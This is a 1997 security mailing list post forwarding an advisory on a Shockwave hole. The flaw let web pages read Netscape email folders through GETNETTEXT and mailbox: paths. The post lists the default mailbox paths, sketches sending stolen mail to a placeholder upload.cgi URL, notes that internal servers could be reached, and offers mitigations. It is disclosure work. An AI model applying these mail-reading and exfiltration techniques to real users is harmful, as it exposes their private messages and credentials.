[73] in Best-of-Security
BoS: Shockwave Security Alert
daemon@ATHENA.MIT.EDU (Aleph One)
Fri Mar 14 08:27:07 1997
Date: Fri, 14 Mar 1997 01:01:17 -0600
Reply-To: Aleph One <aleph1@DFW.NET>
From: Aleph One <aleph1@DFW.NET>
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
http://www.webcomics.com/shockwave/
SHOCKWAVE SECURITY ALERT
AKA :: How to use Shockwave to read people's Netscape email!
10-Mar-97 --- reported by: David de Vitry
What is this about?
This is about a security hole in Shockwave that allows malicious
webpage developers to create a Shockwave movie that will read
through a user's emails, and potentially upload them to a server.
All without the user knowing about it. In addition, there is a
risk to internal Web servers behind corporate firewalls,
regardless of the browser you use (Netscape or Internet Explorer),
as long as you have the current release of Shockwave.
Who could be affected?
Users of Netscape 3.0 (and 2.0?) on Win 95 / NT/ Mac with
Shockwave installed. In addition, the user must not have upgraded
to "Communicator", (this just changes the directory structure) and
must use the Netscape browser to read their email. There may be
other browsers / platfroms affected by similar insecurities with
Shockwave
How is this done?
A developer can use Shockwave to access the user's Netscape email
folders. This is done assuming the name and path to the mailbox on
the users hard drive. For example names such as: Inbox, Outbox,
Sent and Trash are all default names for mail folders. The default
path to the "Inbox" on Win 95/NT would be: "C:/Program
Files/Netscape/Navigator/Mail/Inbox". Then the developer can use
the Shockwave command "GETNETTEXT" to call Navigator to query the
email folder for an email message. The results of this call can
then be feed into a variable, and later processed and sent to a
server. To access a message, for example, the first message in a
users Inbox, would be called using the following location:
For Windows: mailbox:C:/Program
Files/Netscape/Navigator/Mail/Inbox?number=0
For MacOS (thanks Jeremy Traub)
mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C
4/Mail/Inbox?number=0
Note: if these links all give you an error (such as folder no
longer exists), then you might not have anything to worry about.
However, if you see an email message in a pop up window, and you
have Shockwave installed, then you are vulnerable to this security
hole.
Show Me an example! Here it is, a Shockwave movie that will read your
email. This will not work for everyone, it is currently only setup to
work with Win95 / NT, but it could be extended to identify the browser
(Jeremy Traub).
Interesting, but what is the security hole?
It doesn't stop at just the first messages of your inbox.
A shockwave program could increment through a users entire inbox,
outbox, sent, and trash email folder. This information could then
be sent back to a server (using a the GET method with a simple cgi
program. i.e.
http://www...com/upload.cgi?data=This_could_be_your_email_content_
here), all with out the user ever noticing. Here are just a few
types of information that a malicious developer could obtain using
this hole:
+ Your name and email
+ Your friends names and emails
+ User id's and passwords sent to you in email, and where and
how to use them.
+ Personal email messages that you sent or received using
Netscape
The "GETNETTEXT" command also has other problems in that it can
access other http servers, including ones that are not on the
internet, ie, ones that are behind a corporate firewall. That is
if the movie is run from behind the firewall. This may be even a
bigger problem then the email one, however it affects only
corporate users.
Help: What can I do to protect myself?
There are a number of things that you could do to protect yourself
from malicious shockwave movies:
+ Change the path to your mail folders
+ Don't use Netscape to read or send email
+ DeInstall Shockwave
+ Don't go to potentially hostile sites.
What are people saying? -- please inform me of any other articles.
* Wired article
* Macromedia and Netscape have given me no official statements.
However, they are both in communication with me regarding this
issue. Macromedia did say that their newest product "Shockwave 6,"
currently in pre-release, does fix this problem.
* Microsoft did not want to talk with me about the issue, even
though there are risks to their users. They just blew me off
saying "There are obviously plenty of security bugs to go around."
Followed by, "Great, we're checking it out now."
The hosting for this page was made possible by WebComics ,
Interverse and the author David de Vitry
